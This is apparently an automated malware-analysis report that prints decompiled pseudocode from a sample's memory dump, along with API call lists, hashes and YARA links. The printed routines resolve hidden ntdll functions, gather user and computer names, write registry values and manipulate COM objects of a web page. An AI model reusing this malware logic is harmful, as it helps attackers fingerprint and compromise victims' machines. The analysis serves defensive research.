				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0467A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x467d2a8; // 0x47a5a8
					_t1 = _t23 + 0x467e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x467d2a8; // 0x47a5a8
					_t2 = _t26 + 0x467e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0467A734(_t54);
					} else {
						_t30 =  *0x467d2a8; // 0x47a5a8
						_t5 = _t30 + 0x467e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x467d2a8; // 0x47a5a8
							_t7 = _t33 + 0x467e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x467d2a8; // 0x47a5a8
								_t9 = _t36 + 0x467e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x467d2a8; // 0x47a5a8
									_t11 = _t39 + 0x467e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04676604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x0467593c
                                                          0x04675940
                                                          0x04675a02
                                                          0x04675946
                                                          0x04675946
                                                          0x0467594b
                                                          0x0467595e
                                                          0x04675960
                                                          0x04675965
                                                          0x0467596d
                                                          0x04675974
                                                          0x04675976
                                                          0x0467597b
                                                          0x046759fa
                                                          0x046759fb
                                                          0x0467597d
                                                          0x0467597d
                                                          0x04675982
                                                          0x0467598a
                                                          0x0467598c
                                                          0x04675991
                                                          0x00000000
                                                          0x04675993
                                                          0x04675993
                                                          0x04675998
                                                          0x046759a0
                                                          0x046759a2
                                                          0x046759a7
                                                          0x00000000
                                                          0x046759a9
                                                          0x046759a9
                                                          0x046759ae
                                                          0x046759b6
                                                          0x046759b8
                                                          0x046759bd
                                                          0x00000000
                                                          0x046759bf
                                                          0x046759bf
                                                          0x046759c4
                                                          0x046759cc
                                                          0x046759ce
                                                          0x046759d3
                                                          0x00000000
                                                          0x046759d5
                                                          0x046759db
                                                          0x046759e0
                                                          0x046759e7
                                                          0x046759ec
                                                          0x046759f1
                                                          0x00000000
                                                          0x046759f3
                                                          0x046759f6
                                                          0x046759f6
                                                          0x046759f1
                                                          0x046759d3
                                                          0x046759bd
                                                          0x046759a7
                                                          0x04675991
                                                          0x0467597b
                                                          0x04675a10

                                                          APIs
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04678EBD,?,00000001,?,?,00000000,00000000), ref: 04675952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04675974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0467598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046759A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046759B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046759CC
                                                            • Part of subcall function 04676604: memset.NTDLL ref: 04676683
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 72c67f69ce40cea8b42904fe314f3b08c5dc5b0b8bf7fff584dd25ae30bd37c3
                                                          • Instruction ID: ba71b28c2614830e9a167bd857f551771292ca8769871ffbd710992fca1d7c46
                                                          • Opcode Fuzzy Hash: 72c67f69ce40cea8b42904fe314f3b08c5dc5b0b8bf7fff584dd25ae30bd37c3
                                                          • Instruction Fuzzy Hash: 282180B421074AAFD710DFA9C884D5AB7ECEF5430470195A6EA0AC7311FB34ED498F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E0467853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x467d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04679070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04676E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E0467A734(_a8);
						goto L29;
					}
					_t64 =  *0x467d278; // 0x4af9a98
					_t16 = _t64 + 0xc; // 0x4af9b66
					_t65 = E04679070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0467c0
						if(E046722F1(_t97,  *_t33, _t91, _a8,  *0x467d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x467d2a8; // 0x47a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x467ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x467e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04676C38(_t69,  *0x467d334,  *0x467d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x467d2a8; // 0x47a5a8
									_t44 = _t71 + 0x467e846; // 0x74666f53
									_t73 = E04679070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0467c0
										E04675D7D( *_t47, _t91, _a8,  *0x467d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d0467c0
										E04675D7D( *_t49, _t91, _t99,  *0x467d330, _a16);
										E0467A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0467c0
									E04675D7D( *_t40, _t91, _a8,  *0x467d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d0467c0
									E04675D7D( *_t43, _t91, _a8,  *0x467d330, _a16);
								}
								if( *_t101 != 0) {
									E0467A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0467c0
					_t81 = E04678BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0467c0
							E046722F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E0467A734(_t100);
						_t98 = _a16;
					}
					E0467A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0467A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x467d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x0467853f
                                                          0x04678548
                                                          0x0467854f
                                                          0x04678554
                                                          0x046785c1
                                                          0x046785c7
                                                          0x046785cc
                                                          0x046785d3
                                                          0x046785d8
                                                          0x046785dd
                                                          0x04678748
                                                          0x0467874f
                                                          0x0467874f
                                                          0x04678754
                                                          0x04678756
                                                          0x04678756
                                                          0x0467875f
                                                          0x0467875f
                                                          0x046785e3
                                                          0x046785ef
                                                          0x0467873e
                                                          0x04678741
                                                          0x00000000
                                                          0x04678741
                                                          0x046785f5
                                                          0x046785fa
                                                          0x046785fd
                                                          0x04678602
                                                          0x04678607
                                                          0x04678650
                                                          0x04678650
                                                          0x04678663
                                                          0x0467866d
                                                          0x04678673
                                                          0x0467867a
                                                          0x04678684
                                                          0x04678684
                                                          0x0467867c
                                                          0x0467867c
                                                          0x0467867c
                                                          0x0467867c
                                                          0x046786a6
                                                          0x046786ae
                                                          0x046786dc
                                                          0x046786e1
                                                          0x046786e8
                                                          0x046786ed
                                                          0x046786f1
                                                          0x04678723
                                                          0x046786f3
                                                          0x04678700
                                                          0x04678703
                                                          0x04678713
                                                          0x04678716
                                                          0x0467871c
                                                          0x0467871c
                                                          0x046786b0
                                                          0x046786bd
                                                          0x046786c0
                                                          0x046786d2
                                                          0x046786d5
                                                          0x046786d5
                                                          0x0467872d
                                                          0x04678739
                                                          0x0467872f
                                                          0x04678732
                                                          0x04678732
                                                          0x0467872d
                                                          0x046786a6
                                                          0x00000000
                                                          0x0467866d
                                                          0x04678616
                                                          0x04678619
                                                          0x04678620
                                                          0x04678626
                                                          0x04678629
                                                          0x0467862b
                                                          0x04678637
                                                          0x0467863a
                                                          0x0467863a
                                                          0x04678640
                                                          0x04678645
                                                          0x04678645
                                                          0x0467864b
                                                          0x00000000
                                                          0x0467864b
                                                          0x04678559
                                                          0x00000000
                                                          0x04678580
                                                          0x04678580
                                                          0x0467858c
                                                          0x0467859f
                                                          0x046785a5
                                                          0x046785ad
                                                          0x00000000
                                                          0x046785ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(04673741,0000005F,00000000,00000000,00000104), ref: 04678572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0467859F
                                                            • Part of subcall function 04679070: lstrlen.KERNEL32(?,00000000,04AF9A98,00000000,04678808,04AF9C76,?,?,?,?,?,63699BC3,00000005,0467D00C), ref: 04679077
                                                            • Part of subcall function 04679070: mbstowcs.NTDLL ref: 046790A0
                                                            • Part of subcall function 04679070: memset.NTDLL ref: 046790B2
                                                            • Part of subcall function 04675D7D: lstrlenW.KERNEL32(?,?,?,04678708,3D0467C0,80000002,04673741,0467A513,74666F53,4D4C4B48,0467A513,?,3D0467C0,80000002,04673741,?), ref: 04675DA2
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 046785C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: e9c02cdad20aca4ad9af51bc62a87193c941e216d3db4a4aa8b6b26d8c497ae6
                                                          • Instruction ID: 9ebb28208f95a06ff74eb0dcd76c92e96171cc01fe68aae40bb76fc1bdddee90
                                                          • Opcode Fuzzy Hash: e9c02cdad20aca4ad9af51bc62a87193c941e216d3db4a4aa8b6b26d8c497ae6
                                                          • Instruction Fuzzy Hash: EC512976100209BFEF15AFA1DD48E9E7BB9EF44354F008918FA1696220F73AED15AB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467A199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0467A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E0467A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0467A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4671fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x0467a1a7
                                                          0x0467a1aa
                                                          0x0467a1ad
                                                          0x0467a1b3
                                                          0x0467a1b8
                                                          0x0467a1be
                                                          0x0467a1c6
                                                          0x0467a1c9
                                                          0x0467a1cf
                                                          0x0467a1d4
                                                          0x0467a1e1
                                                          0x0467a1ee
                                                          0x0467a1f2
                                                          0x0467a1f4
                                                          0x0467a1f8
                                                          0x0467a1fb
                                                          0x0467a20b
                                                          0x0467a25e
                                                          0x0467a25f
                                                          0x0467a20d
                                                          0x0467a212
                                                          0x0467a213
                                                          0x0467a218
                                                          0x0467a21b
                                                          0x0467a22e
                                                          0x00000000
                                                          0x0467a230
                                                          0x0467a233
                                                          0x0467a238
                                                          0x0467a246
                                                          0x0467a249
                                                          0x0467a24f
                                                          0x0467a254
                                                          0x00000000
                                                          0x0467a256
                                                          0x0467a256
                                                          0x0467a259
                                                          0x0467a259
                                                          0x0467a254
                                                          0x0467a22e
                                                          0x0467a264
                                                          0x0467a265
                                                          0x0467a1d4
                                                          0x0467a26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04671FD2), ref: 0467A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04671FD2), ref: 0467A1C9
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04671FD2), ref: 0467A203
                                                          • GetComputerNameW.KERNEL32(04671FD2,?), ref: 0467A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04671FD2,00000000,04671FD4,00000000,00000000,?,?,04671FD2), ref: 0467A249
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: e416aa24769779c8ccbe765aeda396a41a894980898b5a7e95b4829911f60c15
                                                          • Instruction ID: 4fce62202fa72db62ae738c7f017c3fdb87d6b8d14ce5478dd428aef69c317d6
                                                          • Opcode Fuzzy Hash: e416aa24769779c8ccbe765aeda396a41a894980898b5a7e95b4829911f60c15
                                                          • Instruction Fuzzy Hash: 56210A76A01208FFDB15DFE4C9848EEBBB8FF44304B1444AAE601E7244E635AB44DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04673DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04673DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04675AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0467A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x467d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x04673de9
                                                          0x04673df6
                                                          0x04673df8
                                                          0x04673e5b
                                                          0x00000000
                                                          0x04673e5b
                                                          0x04673e10
                                                          0x04673e17
                                                          0x04673e23
                                                          0x04673e28
                                                          0x04673e2a
                                                          0x04673e2c
                                                          0x04673e2e
                                                          0x04673e30
                                                          0x04673e32
                                                          0x04673e3e
                                                          0x04673e4e
                                                          0x00000000
                                                          0x04673e40
                                                          0x04673e40
                                                          0x04673e47
                                                          0x04673e54
                                                          0x04673e54
                                                          0x04673e54
                                                          0x04673e47
                                                          0x04673e3e
                                                          0x04673e59
                                                          0x00000000
                                                          0x00000000
                                                          0x04673e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,046767B8,?,?,00000000,00000000), ref: 04673E23
                                                          • ResetEvent.KERNEL32(?), ref: 04673E28
                                                          • GetLastError.KERNEL32 ref: 04673E40
                                                          • GetLastError.KERNEL32(?,?,00000102,046767B8,?,?,00000000,00000000), ref: 04673E5B
                                                            • Part of subcall function 04675AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04673E08,?,?,?,?,00000102,046767B8,?,?,00000000), ref: 04675AFD
                                                            • Part of subcall function 04675AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04673E08,?,?,?,?,00000102,046767B8,?), ref: 04675B5B
                                                            • Part of subcall function 04675AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04675B6B
                                                          • SetEvent.KERNEL32(?), ref: 04673E4E
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: fab5666065767bb8f50ea357b59f4d2908effebb81ab172ad2a5526d98fd54a3
                                                          • Instruction ID: b07aa4a5b82b13fcc27a89bfce787e63be2c23becce3b505acbc582f80dc3546
                                                          • Opcode Fuzzy Hash: fab5666065767bb8f50ea357b59f4d2908effebb81ab172ad2a5526d98fd54a3
                                                          • Instruction Fuzzy Hash: A6016231104201ABDB306F71DC44F1BB7A4EF54768F104A26F991D12E0F721F885EBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04673E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04673E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x467d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x467d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x467d258 = _t6;
					 *0x467d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x467d254 = _t7;
					if(_t7 == 0) {
						 *0x467d254 =  *0x467d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x04673e71
                                                          0x04673e77
                                                          0x04673e7e
                                                          0x00000000
                                                          0x04673ed8
                                                          0x04673e80
                                                          0x04673e88
                                                          0x04673e95
                                                          0x04673e95
                                                          0x04673ed5
                                                          0x00000000
                                                          0x04673ed5
                                                          0x04673e97
                                                          0x04673e97
                                                          0x04673e9c
                                                          0x04673eae
                                                          0x04673eb3
                                                          0x04673eb9
                                                          0x04673ebf
                                                          0x04673ec6
                                                          0x04673ec8
                                                          0x04673ec8
                                                          0x00000000
                                                          0x04673ecf
                                                          0x04673e91
                                                          0x00000000
                                                          0x00000000
                                                          0x04673e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0467131F,?,?,00000001,?,?,?,04674EF2,?), ref: 04673E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 04673E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 04673E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04674EF2,?), ref: 04673EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 04673ED8
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 50733037c8fb9aa88b88007f918c6213d18c5fc34afe4e13c9d4bc306386f4fc
                                                          • Instruction ID: 9e9408c52429ffa2fd4d4249248da103a3a7ef6bedd2631c2088296d1c1c5fc2
                                                          • Opcode Fuzzy Hash: 50733037c8fb9aa88b88007f918c6213d18c5fc34afe4e13c9d4bc306386f4fc
                                                          • Instruction Fuzzy Hash: 3EF0AF70640302ABE7288F24A819B193B61EBC0701F201916EB13CA3C0F779E8C2DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E04676F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x467d2a8; // 0x47a5a8
					_t5 = _t103 + 0x467e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x467c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x467d2a8; // 0x47a5a8
												_t28 = _t109 + 0x467e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x467d2a8; // 0x47a5a8
														_t33 = _t79 + 0x467e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x04676f3f
                                                          0x04676f48
                                                          0x04676f49
                                                          0x04676f4d
                                                          0x04676f53
                                                          0x04676f59
                                                          0x04676f62
                                                          0x04676f68
                                                          0x04676f72
                                                          0x04676f74
                                                          0x04676f7a
                                                          0x04676f7f
                                                          0x04676f8a
                                                          0x04676f90
                                                          0x04676f95
                                                          0x046770b7
                                                          0x04676f9b
                                                          0x04676f9b
                                                          0x04676fa8
                                                          0x04676fae
                                                          0x04676fb4
                                                          0x04676fb8
                                                          0x04676fbe
                                                          0x04676fcb
                                                          0x04676fcf
                                                          0x04676fd5
                                                          0x04676fd8
                                                          0x04676fe0
                                                          0x04676fe1
                                                          0x04676fe5
                                                          0x04676fe9
                                                          0x04676fec
                                                          0x04676fef
                                                          0x04676ff5
                                                          0x04676ffe
                                                          0x04677004
                                                          0x04677005
                                                          0x04677008
                                                          0x04677009
                                                          0x0467700a
                                                          0x04677012
                                                          0x04677013
                                                          0x04677014
                                                          0x04677016
                                                          0x0467701a
                                                          0x0467701e
                                                          0x00000000
                                                          0x00000000
                                                          0x04677024
                                                          0x0467702d
                                                          0x04677033
                                                          0x0467703d
                                                          0x04677041
                                                          0x04677043
                                                          0x04677050
                                                          0x04677054
                                                          0x0467705c
                                                          0x04677061
                                                          0x04677073
                                                          0x04677075
                                                          0x0467707b
                                                          0x0467707b
                                                          0x04677084
                                                          0x04677084
                                                          0x04677086
